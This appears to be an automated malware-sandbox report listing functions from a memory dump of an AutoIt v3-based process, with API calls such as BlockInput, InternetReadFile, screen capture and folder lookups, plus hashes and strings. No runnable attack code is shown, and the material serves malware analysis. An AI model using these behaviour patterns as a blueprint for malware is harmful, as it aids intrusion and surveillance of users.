Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: U$\
API String ID: 4104443479-100911408
Opcode ID: f0bb73db9144d8760abb3d3db4f5063b877cc06d28119abf5f1907807364760d
Instruction ID: 89acdeab6b8563da657dbfd7810656ce902d8c63187dd11389c0456b61ff5af3
Opcode Fuzzy Hash: f0bb73db9144d8760abb3d3db4f5063b877cc06d28119abf5f1907807364760d
Instruction Fuzzy Hash: C702A170E0024D8FDB28CF68C8907BEBBF2AF85314F2481ADD656A73A5D3345946DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2285, Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00FF22A5
InternetReadFile.WININET(?,00000000,?,?), ref: 00FF22DD

Part of subcall function 00FF2252: GetLastError.KERNEL32 ref: 00FF2268

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 901099227-0
Opcode ID: d560dba5d685f05ab8cc77eac2901ace341a07a34e85dba8b3ffa12d0b9181a8
Instruction ID: 5aa3e2f954fab5d6f97af645dcb71e62c82931183f251ff253f15c0691337b1f
Opcode Fuzzy Hash: d560dba5d685f05ab8cc77eac2901ace341a07a34e85dba8b3ffa12d0b9181a8
Instruction Fuzzy Hash: 232174716402087AE760DE15DC82FBA73ACFF94724F00C029FB099A191D779E5459BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100A35D, Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0100A378

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6ac1d97c46a8e3aac57c08b424a533d4aced1116a202a9bc62ed7223d4101140
Instruction ID: c44e37298a7238a2fff804ebd9cdacc6c72817e2487e01c6b3ea78c126bfb131
Opcode Fuzzy Hash: 6ac1d97c46a8e3aac57c08b424a533d4aced1116a202a9bc62ed7223d4101140
Instruction Fuzzy Hash: 9BE04F752043059BD720AF6AD8499AAB7ECEF98760F00C429F985C7341DBB5E840DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010090AA, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 010090DF
SystemParametersInfoW.USER32 ref: 0100919C
SetRect.USER32 ref: 010091DC
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010091ED
CreateWindowExW.USER32 ref: 0100922F
GetClientRect.USER32 ref: 0100923B
CreateWindowExW.USER32 ref: 0100927D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0100928F
GetStockObject.GDI32(00000011), ref: 01009299
SelectObject.GDI32(00000000,00000000), ref: 010092A1
GetTextFaceW.GDI32(00000000,00000040,?), ref: 010092B1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010092BA
DeleteDC.GDI32(00000000), ref: 010092C3
CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01009309
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01009321
CreateWindowExW.USER32 ref: 0100935B
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0100936F
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01009380
CreateWindowExW.USER32 ref: 010093B5
GetStockObject.GDI32(00000011), ref: 010093C0
SendMessageW.USER32(?,00000030,00000000), ref: 010093D0
ShowWindow.USER32(?,00000004), ref: 010093DB

Strings

static, xrefs: 01009276, 010093AE
msctls_progress32, xrefs: 01009351
DISPLAY, xrefs: 01009285
AutoIt v3, xrefs: 01009229

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: edb6b2e6c45b6af813620d14f9ea4591a7cfbe5d1470c4bc8e0d074e15b08da8
Instruction ID: d611dae499d17addd11e386df783fa553a024391a14f107dd5a7e1febb3dfca8
Opcode Fuzzy Hash: edb6b2e6c45b6af813620d14f9ea4591a7cfbe5d1470c4bc8e0d074e15b08da8
Instruction Fuzzy Hash: 1FA190B5B40204BFEB24DF64DD8AFAE7769EB44701F108508FB45AF2C5D7B5A9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 01006529, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 01006625
GetDesktopWindow.USER32 ref: 0100663A
GetWindowRect.USER32 ref: 01006641
GetWindowLongW.USER32(?,000000F0), ref: 01006699
GetWindowLongW.USER32(?,000000F0), ref: 010066AC
DestroyWindow.USER32 ref: 010066BD
CreateWindowExW.USER32 ref: 0100670B
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 01006729
SendMessageW.USER32(?,00000418,00000000,?), ref: 0100673D
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0100674D
SendMessageW.USER32(?,00000421,?,?), ref: 0100676D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01006783
IsWindowVisible.USER32(?), ref: 010067A3
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 010067BF
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 010067D3
GetWindowRect.USER32 ref: 010067EA
MonitorFromPoint.USER32(?,00000001,00000002), ref: 01006808
GetMonitorInfoW.USER32(00000000,?), ref: 01006820
CopyRect.USER32(?,?), ref: 01006835
SendMessageW.USER32(?,00000412,00000000), ref: 0100688B

Strings

tooltips_class32, xrefs: 01006704
,, xrefs: 010065E3
(, xrefs: 01006816

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
String ID: ($,$tooltips_class32
API String ID: 225202481-3320066284
Opcode ID: 6044dd60061354a8aaef77f476eabf52c0b6349e31c6ebabaac5002c08e65a0a
Instruction ID: e594a79e898905dd909a2cab427d02d30a0391f2c88866ec73e14aa0a1b77de3
Opcode Fuzzy Hash: 6044dd60061354a8aaef77f476eabf52c0b6349e31c6ebabaac5002c08e65a0a
Instruction Fuzzy Hash: 47B18370A00309AFEB55DFA8CC85FEEBBB5FF48300F108558E559AB281DB75A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01018322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 01018354
__wcsicoll.LIBCMT ref: 0101836C
__wcsnicmp.LIBCMT ref: 0101838C

Strings

ALL, xrefs: 0101842C
REGEXP=, xrefs: 010183AF
[REGEXPTITLE:, xrefs: 010183C1
[ALL, xrefs: 0101843E
[HANDLE:, xrefs: 01018398
CLASSNAME=, xrefs: 010183D8
[CLASS:, xrefs: 010183EA
[LAST, xrefs: 01018445
ACTIVE, xrefs: 01018366
LAST, xrefs: 0101834E
HANDLE=, xrefs: 01018386
[ACTIVE, xrefs: 01018378

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$__wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 790654849-1810252412
Opcode ID: b47454a2e748a7372c19c01d0177e29780d3731bab4d98de39ea67405da5bff5
Instruction ID: a9281131b78c0dfaecca5d34baea8b6f899843d4e0d45a3c7d24387dc9b98ab0
Opcode Fuzzy Hash: b47454a2e748a7372c19c01d0177e29780d3731bab4d98de39ea67405da5bff5
Instruction Fuzzy Hash: 8B31D831A4420967CB10EAA5CD43FDE73ACAF41301F504126FDC1BB196EE2CBF049AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FE41CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00FE41EE
__wcsicoll.LIBCMT ref: 00FE42A2
LoadIconW.USER32 ref: 00FE42B8

Strings

blank, xrefs: 00FE41E8
info, xrefs: 00FE429C
question, xrefs: 00FE420D
stop, xrefs: 00FE4231
warning, xrefs: 00FE4255

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2485277191-404129466
Opcode ID: 12449b123ccb25a18778064c05cfa48cd16dd8da680be54967a84a56ab70a08f
Instruction ID: 692bbf858b74570f3bceb73fa49b7a04a4b63792678bb7473b450501788bc791
Opcode Fuzzy Hash: 12449b123ccb25a18778064c05cfa48cd16dd8da680be54967a84a56ab70a08f
Instruction Fuzzy Hash: 5621DD32B4025676DB109E66BD06FDB339CDF95362F04003AFA44E6146E366B920A3F5

Uniqueness

Uniqueness Score: -1.00%

Function 010045AE, Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 010045C1
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 010045D3
SetWindowTextW.USER32 ref: 010045ED
GetDlgItem.USER32(?,000003EA), ref: 01004605
SetWindowTextW.USER32 ref: 0100460C
GetDlgItem.USER32(?,000003E9), ref: 0100461D
SetWindowTextW.USER32 ref: 01004624
SendDlgItemMessageW.USER32 ref: 01004646
SendDlgItemMessageW.USER32 ref: 01004660
GetWindowRect.USER32 ref: 0100466A
SetWindowTextW.USER32 ref: 010046DA
GetDesktopWindow.USER32 ref: 010046E4
GetWindowRect.USER32 ref: 010046EB
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01004739
GetClientRect.USER32 ref: 01004747
PostMessageW.USER32 ref: 01004771
SetTimer.USER32(?,0000040A,?,00000000), ref: 010047B4

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: a0f1c3837867ce4808c349c309db906ea58a7b70d0dd36402c134284925e2b9d
Instruction ID: 23c938cd50bbc6b8a175fbb514ff3cc64a634d29cb372ccf5bf7fb37361889c7
Opcode Fuzzy Hash: a0f1c3837867ce4808c349c309db906ea58a7b70d0dd36402c134284925e2b9d
Instruction Fuzzy Hash: A6614A71A00705ABEB24DFA8CD89FAFB7F8AF48704F004918E686D7280D779E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 010145E0, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01014765
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01014775
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101479D
_wcslen.LIBCMT ref: 01014865
GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 01014879
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 010148A1
_wcslen.LIBCMT ref: 010148F7
_wcslen.LIBCMT ref: 0101490D
_wcslen.LIBCMT ref: 0101492C

Strings

D, xrefs: 0101460D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$Directory$CurrentSystem
String ID: D
API String ID: 1914653954-2746444292
Opcode ID: 411b620fff2cadbdbff4b69c6210c4cc51ece29bc366b8705e8791bc068c1084
Instruction ID: f3aa157ec3e0b786688480c3ef12bc7f27ccc6b37490b067c13ca88d3ee076b3
Opcode Fuzzy Hash: 411b620fff2cadbdbff4b69c6210c4cc51ece29bc366b8705e8791bc068c1084
Instruction Fuzzy Hash: 16E1BE719043419BD310EF68C885B6FB7E8AF85304F14896CF9C9873A2DB39E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

__wcsicoll.LIBCMT ref: 00FB2262
__wcsicoll.LIBCMT ref: 00FB2278
__wcsicoll.LIBCMT ref: 00FB228E

Part of subcall function 00FC13CB: __wcsicmp_l.LIBCMT ref: 00FC144B

__wcsicoll.LIBCMT ref: 00FB22A4
_wcscpy.LIBCMT ref: 00FB22C4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\33920049\fmkkelc.omp,00000104), ref: 00FD8AD6
_wcscpy.LIBCMT ref: 00FD8B29

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FB21B9, 00FB21C0, 00FB22B4, 00FB22BF, 00FD8ABE, 00FD8B24
CMDLINE, xrefs: 00FB21F8
/AutoIt3ExecuteScript, xrefs: 00FB229F
CMDLINERAW, xrefs: 00FB21CF
/ErrorStdOut, xrefs: 00FB225D
/AutoIt3OutputDebug, xrefs: 00FB2273
/AutoIt3ExecuteLine, xrefs: 00FB2289

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\33920049\fmkkelc.omp$CMDLINE$CMDLINERAW
API String ID: 574121520-1212665144
Opcode ID: f4aae3c9ae8eb68ea21685e45801e1a8b29e59e2334529ee260b9aa1070d6b96
Instruction ID: 4898b348956812ce719c69e87e45b3b88f2565bf8a76be14c3082610b8621b0b
Opcode Fuzzy Hash: f4aae3c9ae8eb68ea21685e45801e1a8b29e59e2334529ee260b9aa1070d6b96
Instruction Fuzzy Hash: B4718271D1020A9BDF00EBA5DC53AEE7778BF40344F444429E901BB242EB786949EFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0101910A, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 01019155
GetFocus.USER32 ref: 01019169
GetDlgCtrlID.USER32 ref: 01019174
PostMessageW.USER32 ref: 010191C8

Strings

0, xrefs: 010192CB

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$CtrlFocus
String ID: 0
API String ID: 1534620443-4108050209
Opcode ID: 4e3a48d0fc25bf972fd842c7548efa474e64d3b1d73adf9429f451c619928776
Instruction ID: 163dd24795dc97540a26fd1ada9fde79ee14fa4a566c62df3608cda26f25b550
Opcode Fuzzy Hash: 4e3a48d0fc25bf972fd842c7548efa474e64d3b1d73adf9429f451c619928776
Instruction Fuzzy Hash: 3591E1716043159FE720CF18D895BABB7E8FF88718F00851DFAD193285C7B99944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 010105C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00FD7F37,?,0000138C,?,00000001,?,?,?), ref: 010105F5
LoadStringW.USER32(00000000,?,00FD7F37,?), ref: 010105FC

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00FD7F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0101061C
LoadStringW.USER32(00000000,?,00FD7F37,?), ref: 01010623
__swprintf.LIBCMT ref: 01010661
__swprintf.LIBCMT ref: 01010679
_wprintf.LIBCMT ref: 0101072D
MessageBoxW.USER32 ref: 01010746

Strings

Line %d:, xrefs: 0101065B
%s (%d) : ==> %s: %s %s, xrefs: 01010728
Line %d (File "%s"):, xrefs: 01010673
Error: , xrefs: 010106F8
^ ERROR, xrefs: 010106CF

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 3631882475-2268648507
Opcode ID: cded454426835ed4564ab870b929bbd802d898abcfa01fdbfb638ff991728322
Instruction ID: 866152bdb38ac93858c87b6920168204f91227d9df7c262ffc7fe3cd4ff966a5
Opcode Fuzzy Hash: cded454426835ed4564ab870b929bbd802d898abcfa01fdbfb638ff991728322
Instruction Fuzzy Hash: 08419C7290020AABDB00FBA1DC86DEE777CEF48351F444429F644A7156DA78AA45DFB0

Uniqueness

Uniqueness Score: -1.00%

Function 01022095, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0102225C
__swprintf.LIBCMT ref: 01022273
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0103BF48), ref: 010224A6
SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0103BF48), ref: 010224C0
SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0103BF48), ref: 010224DA
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0103BF48), ref: 010224F4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0103BF48), ref: 0102250E
SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0103BF48), ref: 01022528
SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0103BF48), ref: 01022542
SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0103BF48), ref: 0102255C
SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0103BF48), ref: 01022576

Strings

%.3d, xrefs: 01022267

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath$LocalTime__swprintf
String ID: %.3d
API String ID: 3337348382-986655627
Opcode ID: 744d5c4aea7b0421ef3a4cf39c346a005dbc87a5da293c4247a6f29488a5880b
Instruction ID: 1cb5ee9943d33d642c959822d226d6ffffd0db777b71fe3f8ab69c7fd9879040
Opcode Fuzzy Hash: 744d5c4aea7b0421ef3a4cf39c346a005dbc87a5da293c4247a6f29488a5880b
Instruction Fuzzy Hash: 9DC1D932654218ABDB60EFA1DC86FEE737CFF44700F404559FA09A7082DB759A099FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0101138A, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 010113C4
_wcslen.LIBCMT ref: 010113CF
__swprintf.LIBCMT ref: 0101146D
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 010114E0
GetClassNameW.USER32(?,?,00000400), ref: 0101155D
GetDlgCtrlID.USER32 ref: 010115B5
GetWindowRect.USER32 ref: 010115F0
GetParent.USER32(?), ref: 0101160F
ScreenToClient.USER32(00000000), ref: 01011616
GetClassNameW.USER32(?,?,00000100), ref: 0101168D
GetWindowTextW.USER32 ref: 010116CA

Strings

%s%u, xrefs: 01011467

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
String ID: %s%u
API String ID: 1899580136-679674701
Opcode ID: d88b535ea8ba67507956280896a5fbd707ed0a625a10d83d13967df2c3a85f21
Instruction ID: 042bba3b9b22adc98d900c0bb84bb197ff4d3f444300de0e1753696d46f645c0
Opcode Fuzzy Hash: d88b535ea8ba67507956280896a5fbd707ed0a625a10d83d13967df2c3a85f21
Instruction Fuzzy Hash: A8A1E5725043019BDB15DF24C885FAA77E8FF88350F048969FEC99B24AD739E506CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1329, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FE139D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FE13AE
CreateCompatibleDC.GDI32(00000000), ref: 00FE13B8
SelectObject.GDI32(00000000,?), ref: 00FE13C5
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00FE142B
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FE1464

Strings

(, xrefs: 00FE144C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
